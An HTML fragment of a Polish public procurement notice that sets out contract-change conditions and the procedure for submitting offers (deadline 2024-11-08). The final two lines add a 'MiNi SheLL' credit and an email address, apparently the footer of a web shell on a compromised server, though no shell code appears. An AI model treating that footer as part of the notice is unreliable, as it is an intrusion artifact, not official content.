PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3. Zakazuje się zmian postanowień umowy w stosunku do treści SWZ oraz oferty Wykonawcy , na podstawie której<br/>dokonano jego wyboru, z zastrzeżeniem, że zmiana postanowień umowy w stosunku do treści oferty jest możliwa poprzez:<br/>a. zmianę terminu wykonania przedmiotu Umowy, w przypadku niemożności zachowania pierwotnie ustalonych w Umowie<br/>terminów z przyczyn, których nie można było przewidzieć w chwili zawierania Umowy, niezawinionych przez żadną ze<br/>Stron,<br/>b. zmiany ustawowej wysokości stawki podatku od towaru i usług (VAT).<br/>4. Zmiany umowy mogą nastąpić nie wcześniej niż po wcześniejszym zaakceptowaniu przez strony umowy, stosownego<br/>wniosku, zawierającego propozycję nowych warunków umownych, a jeżeli wprowadzona zmiana dotyczy wynagrodzenia<br/>wykonawcy – również szczegółowe wyliczenie wynagrodzenia należnego Wykonawcy po dokonaniu zmiany.<br/>5. Zmiany umowy wymagają pisemnego aneksu do umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamówienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com